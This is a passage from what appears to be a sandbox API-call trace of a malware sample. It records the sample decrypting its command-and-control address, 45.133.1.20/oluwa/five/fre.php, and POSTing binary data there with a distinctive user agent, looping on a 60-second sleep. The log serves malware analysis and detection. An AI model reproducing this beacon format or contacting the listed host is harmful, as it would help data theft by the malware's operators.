hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0220.947] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x88c) returned 0x660 [0220.949] Sleep (dwMilliseconds=0xea60) [0220.950] GetProcessHeap () returned 0x6a0000 [0220.950] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0220.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.952] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0220.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.958] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0220.966] GetProcessHeap () returned 0x6a0000 [0220.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d89e0 [0220.966] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.967] CryptImportKey (in: hProv=0x6bef48, pbData=0x6d89e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0220.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.969] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0220.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.970] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0220.970] GetProcessHeap () returned 0x6a0000 [0220.970] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d89e0 | out: hHeap=0x6a0000) returned 1 [0220.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.971] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0220.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.979] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0220.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0220.981] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0220.981] GetProcessHeap () returned 0x6a0000 [0220.981] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0220.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.982] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0220.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0220.984] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.007] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.008] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.009] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.009] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.009] GetProcessHeap () returned 0x6a0000 [0221.009] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0221.019] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.019] GetProcessHeap () returned 0x6a0000 [0221.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0221.020] GetProcessHeap () returned 0x6a0000 [0221.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.020] GetProcessHeap () returned 0x6a0000 [0221.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0221.021] GetProcessHeap () returned 0x6a0000 [0221.021] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0221.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.022] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.028] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.028] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0221.039] GetProcessHeap () returned 0x6a0000 [0221.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0221.040] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.040] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0221.041] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.041] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.042] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.042] GetProcessHeap () returned 0x6a0000 [0221.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0221.043] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.044] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0221.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.045] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0221.046] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.046] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0221.046] GetProcessHeap () returned 0x6a0000 [0221.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0221.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.048] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0221.048] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.049] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0221.049] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.050] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0221.050] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.051] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0221.051] GetProcessHeap () returned 0x6a0000 [0221.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0221.051] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0221.051] GetProcessHeap () returned 0x6a0000 [0221.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0221.051] socket (af=2, type=1, protocol=6) returned 0x664 [0221.051] connect (s=0x664, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0221.075] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0221.075] GetProcessHeap () returned 0x6a0000 [0221.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0221.076] GetProcessHeap () returned 0x6a0000 [0221.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0221.077] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.128] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.128] GetProcessHeap () returned 0x6a0000 [0221.128] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0221.128] GetProcessHeap () returned 0x6a0000 [0221.128] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0221.129] GetProcessHeap () returned 0x6a0000 [0221.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0221.129] GetProcessHeap () returned 0x6a0000 [0221.129] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0221.129] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.130] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.130] GetProcessHeap () returned 0x6a0000 [0221.130] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0221.130] GetProcessHeap () returned 0x6a0000 [0221.131] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0221.131] send (s=0x664, buf=0x6b5c98*, len=242, flags=0) returned 242 [0221.132] send (s=0x664, buf=0x6bb998*, len=159, flags=0) returned 159 [0221.132] GetProcessHeap () returned 0x6a0000 [0221.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0221.132] recv (in: s=0x664, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0221.213] GetProcessHeap () returned 0x6a0000 [0221.213] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0221.213] GetProcessHeap () returned 0x6a0000 [0221.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0221.214] GetProcessHeap () returned 0x6a0000 [0221.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0221.214] GetProcessHeap () returned 0x6a0000 [0221.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0221.215] closesocket (s=0x664) returned 0 [0221.215] GetProcessHeap () returned 0x6a0000 [0221.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0221.216] GetProcessHeap () returned 0x6a0000 [0221.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.216] GetProcessHeap () returned 0x6a0000 [0221.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0221.216] GetProcessHeap () returned 0x6a0000 [0221.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0221.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x758) returned 0x664 [0221.219] Sleep (dwMilliseconds=0xea60) [0221.220] GetProcessHeap () returned 0x6a0000 [0221.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0221.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.222] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0221.259] GetProcessHeap () returned 0x6a0000 [0221.259] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d87a0 [0221.260] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.260] CryptImportKey (in: hProv=0x6bf058, pbData=0x6d87a0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0221.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.262] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.263] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.263] GetProcessHeap () returned 0x6a0000 [0221.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d87a0 | out: hHeap=0x6a0000) returned 1 [0221.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.266] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0221.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.268] CryptDestroyKey (hKey=0x6ad020) returned 1 [0221.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.269] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0221.269] GetProcessHeap () returned 0x6a0000 [0221.269] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0221.270] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.270] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.271] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.272] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.272] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.273] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.274] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.274] GetProcessHeap () returned 0x6a0000 [0221.274] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0221.274] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.274] GetProcessHeap () returned 0x6a0000 [0221.275] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0221.276] GetProcessHeap () returned 0x6a0000 [0221.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.276] GetProcessHeap () returned 0x6a0000 [0221.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0221.276] GetProcessHeap () returned 0x6a0000 [0221.276] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0221.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0221.305] GetProcessHeap () returned 0x6a0000 [0221.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6d8a10 [0221.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.307] CryptImportKey (in: hProv=0x6bf278, pbData=0x6d8a10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0221.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.308] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.309] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.309] GetProcessHeap () returned 0x6a0000 [0221.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8a10 | out: hHeap=0x6a0000) returned 1 [0221.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.348] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0221.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.350] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0221.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.351] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0221.351] GetProcessHeap () returned 0x6a0000 [0221.351] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0221.352] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.352] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0221.353] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.354] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0221.355] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.355] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0221.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.373] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0221.373] GetProcessHeap () returned 0x6a0000 [0221.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0221.373] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0221.373] GetProcessHeap () returned 0x6a0000 [0221.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0221.373] socket (af=2, type=1, protocol=6) returned 0x668 [0221.374] connect (s=0x668, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0221.438] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0221.438] GetProcessHeap () returned 0x6a0000 [0221.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0221.438] GetProcessHeap () returned 0x6a0000 [0221.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0221.439] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.440] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.440] GetProcessHeap () returned 0x6a0000 [0221.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0221.440] GetProcessHeap () returned 0x6a0000 [0221.441] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0221.441] GetProcessHeap () returned 0x6a0000 [0221.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0221.441] GetProcessHeap () returned 0x6a0000 [0221.441] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0221.442] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.443] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.443] GetProcessHeap () returned 0x6a0000 [0221.443] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0221.443] GetProcessHeap () returned 0x6a0000 [0221.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0221.444] send (s=0x668, buf=0x6b5c98*, len=242, flags=0) returned 242 [0221.444] send (s=0x668, buf=0x6bb998*, len=159, flags=0) returned 159 [0221.445] GetProcessHeap () returned 0x6a0000 [0221.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c66f8 [0221.445] recv (in: s=0x668, buf=0x6c66f8, len=4048, flags=0 | out: buf=0x6c66f8*) returned 204 [0221.516] GetProcessHeap () returned 0x6a0000 [0221.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0221.517] GetProcessHeap () returned 0x6a0000 [0221.517] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0221.517] GetProcessHeap () returned 0x6a0000 [0221.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0221.518] GetProcessHeap () returned 0x6a0000 [0221.518] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0221.518] closesocket (s=0x668) returned 0 [0221.519] GetProcessHeap () returned 0x6a0000 [0221.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0221.519] GetProcessHeap () returned 0x6a0000 [0221.519] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.519] GetProcessHeap () returned 0x6a0000 [0221.521] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0221.522] GetProcessHeap () returned 0x6a0000 [0221.522] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0221.522] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c66f8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb24) returned 0x668 [0221.526] Sleep (dwMilliseconds=0xea60) [0221.527] GetProcessHeap () returned 0x6a0000 [0221.527] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0221.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.529] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.546] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, 